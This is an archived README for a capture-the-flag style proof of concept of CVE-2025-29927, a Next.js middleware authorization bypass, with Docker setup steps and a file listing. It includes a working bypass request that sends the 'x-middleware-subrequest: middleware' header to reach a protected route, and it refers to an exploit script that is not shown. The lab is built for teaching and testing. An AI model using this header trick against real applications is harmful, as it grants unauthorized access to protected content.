关联漏洞
介绍
# CVE-2025-29927 - Next.js Middleware Authorization Bypass (PoC)
This is a **Capture The Flag (CTF)** styled Proof of Concept for the **Next.js Middleware Authorization Bypass** vulnerability (**CVE-2025-29927**). The goal is to bypass the auth middleware and retrieve the flag from the `/protected` route.
---
## Vulnerability Summary
- **CVE**: CVE-2025-29927
- **Type**: Authorization Bypass
- **Component**: Next.js Middleware
- **Impact**: Unauthorized access to protected routes
- **PoC Target Route**: `/protected`
- **Expected Behavior**: Unauthorized users are redirected to `/`
- **Vulnerable Behavior**: Using a crafted request allows bypassing the redirect and accessing the protected content directly
---
## PoC Setup
### 1. Clone the Repository
```bash
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker
```
---
### 2. Build and Run the Vulnerable App
```bash
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app
```
This will start the vulnerable Next.js app on **http://IP:3000**
---
## Exploitation
### 1. Without Exploit
Try accessing:
```bash
curl -i http://IP:3000/protected
```
You will be redirected to `/`.
```bash
curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected
```
### 2. With Exploit
Use the provided `exploit.py` to bypass the middleware and access the protected route:
```bash
python3 exploit.py -url http://IP:3000
```
If successful, you will retrieve the flag from `/protected`.
---
## Files
- `Dockerfile` - Builds the vulnerable Next.js application
- `exploit.py` - Exploits the vulnerability to bypass auth
- `pages/` - Contains the vulnerable `/protected` and `/login` routes
- `middleware.js` - The vulnerable middleware logic
- `README.md` - This file
---
## Disclaimer
This PoC is for **educational and research purposes only**. Do not use it against systems you do not own or have explicit permission to test.
---
## 🏁 Flag
Find the flag by exploiting the vulnerability and accessing:
```
http://IP:3000/protected
```
Good luck! 🏴☠️
文件快照
[4.0K] /data/pocs/5fc47cddf1f9b5abd276fd539b4ebaed792eb653
├── [1.9K] exploit.py
├── [4.0K] nextjs-docker
│ ├── [ 404] Dockerfile
│ ├── [ 417] middleware.js
│ ├── [ 271] package.json
│ └── [4.0K] pages
│ ├── [4.0K] api
│ │ └── [ 478] login.js
│ ├── [ 667] index.js
│ ├── [1.8K] login.js
│ └── [ 530] protected.js
└── [2.1K] README.md
3 directories, 9 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。